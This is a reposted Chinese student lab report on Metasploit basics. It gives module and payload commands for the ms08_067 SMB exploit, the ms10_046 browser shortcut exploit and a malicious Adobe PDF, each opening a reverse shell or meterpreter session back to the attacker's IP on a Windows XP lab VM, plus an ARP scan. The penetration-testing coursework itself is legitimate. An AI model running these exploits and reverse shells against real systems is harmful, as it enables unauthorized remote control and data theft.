日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

20155216 Exp5 MSF基础应用

發(fā)布時間:2024/4/17 编程问答 48 豆豆
生活随笔 收集整理的這篇文章主要介紹了 20155216 Exp5 MSF基础应用 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

Exp5 MSF基礎(chǔ)應(yīng)用

基礎(chǔ)問題回答

  • 1、用自己的話解釋什么是exploit,payload,encode?

exploit :
Exploit的英文意思就是利用,在做攻擊時,通常稱為漏洞利用。
一個利用程序(An exploit)就是一段通過觸發(fā)一個漏洞(或者幾個漏洞)進(jìn)而控制目標(biāo)系統(tǒng)的代碼。
exploits利用代碼可以在本地也可在遠(yuǎn)程進(jìn)行。一個遠(yuǎn)程攻擊利用允許攻擊者遠(yuǎn)程操縱計算機,理想狀態(tài)下能夠執(zhí)行任意代碼。

payload :
payload屬于名詞,意為有效載荷,在病毒代碼中實現(xiàn)一些有害的或者惡性的動作的部分叫做“有效負(fù)載”(payload)。
payload可以實現(xiàn)任何運行在受害者環(huán)境中的程序所能做的事情,并且能夠執(zhí)行動作包括破壞文件刪除文件,向病毒的作者或者任意的接收者發(fā)送敏感信息,以及提供通向被感染計算機的后門。

encode :
encode本意為編碼,可在不改變payload功能的情況下對其進(jìn)行編碼,一些好的編碼方式可以使攻擊或相關(guān)的文件不被發(fā)現(xiàn)。

實踐內(nèi)容

一、主動攻擊:ms08_067漏洞攻擊

攻擊機: kali linux x64

靶機: windows XP SP3(English)

實驗前準(zhǔn)備:將windows XP的防火墻關(guān)閉;進(jìn)入msfconsole界面。

1、先用 search ms08_067 指令查詢針對該漏洞可以運用的攻擊模塊:

根據(jù)提示,使用 use exploit/windows/smb/ms08_067_netapi 使用該模塊,并使用 show payloads 查看可以供我們使用的payload:

可查看到有很多可以使用的正常的payload。

2、選擇通過反向連接來獲取shell的 generic/shell_reverse_tcp 作為payload,使用指令 set payload generic/shell_reverse_tcp 對payload進(jìn)行設(shè)置,并使用 show options 查看:

3、發(fā)現(xiàn)源端口和目的端口是默認(rèn)固定的,需要設(shè)置一個RHOST(靶機的IP地址)和一個LHOST(攻擊機的IP地址):

使用 show options 查看設(shè)置結(jié)果:

4、接著使用 exploit 指令開始攻擊:

5、攻擊成功后獲取了靶機的shell,此時可使用 systeminfo 指令查看靶機系統(tǒng)信息:

二、對瀏覽器攻擊:ms10_046漏洞攻擊

1、利用search ms10_046指令查看可以運用的攻擊模塊:

2、根據(jù)提示,使用 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 使用該模塊,并使用show payloads查看:

3、使用 set payload windows/meterpreter/reverse_tcp 設(shè)置payload,并使用show options查看參數(shù):

SRVHOST填的是本地監(jiān)聽主機的IP地址,LHOST也是監(jiān)聽的IP地址,所以這里SRVHOST和LHOST都應(yīng)該填攻擊機的IP地址:

4、使用xp系統(tǒng)打開鏈接: http://192.168.52.131:80/ :

此時kali顯示接入一個會話:

5、使用 sessions -i 1 選擇會話1,成功獲取了靶機的shell,利用 systeminfo 指令查看靶機的系統(tǒng)信息:

三、對Adobe的漏洞攻擊

1、先使用search adobe查詢和adobe漏洞有關(guān)的模塊:

2、個人選擇: exploit/windows/fileformat/adobe_cooltype_sing ,然后show payloads查看payload:

3、選擇 windows/meterpreter/reverse_tcp ,并使用show options查看參數(shù):

只需建立本地主機IP:LHOST,輸入 exploit 將在固定的位置生成相應(yīng)的文件:

5、在文件查看處選擇顯示隱藏文件,在相應(yīng)的位置找到msf.pdf:

6、將文件拷貝至windows XP下,并在kali下輸入:

use exploit/multi/handler set LHOST 192.168.52.131 set LPORT 4444 exploit

7、將win XP下的PDF打開,攻擊機成功獲取到靶機shell:

四、輔助模塊的應(yīng)用

1、使用 show auxiliary 查看可以運用的輔助模塊:

選擇ARP掃描,使用命令: use scanner/discovery/arp_sweep ,并使用show options查看參數(shù):

只需設(shè)置目的主機IP即可:

也可設(shè)置一個網(wǎng)段進(jìn)行掃描:

實驗總結(jié)與體會

通過本次實驗,再一次領(lǐng)略了MSF平臺功能的豐富和強大。不但可以攻擊很多方面的漏洞,還有很多各種各樣的輔助功能,光是掃描就有特別多種,幾乎覆蓋了所有的掃描方式。但也在實驗過程中發(fā)現(xiàn)了MSF的局限性與落后性。在針對系統(tǒng)的攻擊方面,只能攻擊windows XP系統(tǒng),對win7系統(tǒng)的攻擊嘗試無效。并且針對瀏覽器的攻擊也只能攻擊IE8及以下的版本,甚至有些連IE8也攻擊不了,所以在實際應(yīng)用中存在非常大的局限性。
當(dāng)然,通過對MSF攻擊的學(xué)習(xí),我們對一些理論課上學(xué)到的一些攻擊付諸實踐,對于滲透測試有了更深的理解。若要將攻擊運用到實踐中,還需不斷地研究各類新型的漏洞,并獲取更高的權(quán)限對其他主機進(jìn)行掃描和注入。

離實戰(zhàn)還缺些什么技術(shù)或步驟?

1、在實踐中發(fā)現(xiàn)MSF攻擊的局限性很大,其中的漏洞幾乎都是針對win XP系統(tǒng),而實際應(yīng)用的系統(tǒng)大部分是win7及以上的系統(tǒng),如果需要實戰(zhàn)攻擊win7及以上的系統(tǒng),還需要不斷發(fā)現(xiàn)并成功利用新的漏洞。
2、需要提高掃描等信息收集技術(shù),信息收集是做攻擊的重要前提,但大多數(shù)初級的掃描都會被win7及以上的系統(tǒng)發(fā)現(xiàn)甚至拒絕,所以提供相應(yīng)的技術(shù)很重要。
3、在對Adobe的漏洞攻擊中,需要把PDF文件植入被攻擊主機,如果在不被發(fā)現(xiàn)植入危險的文件的情況下成功將攻擊所需文件植入靶機,也是一個值得深思的問題。

轉(zhuǎn)載于:https://www.cnblogs.com/LeeX1997/p/8920919.html

總結(jié)

以上是生活随笔為你收集整理的20155216 Exp5 MSF基础应用的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。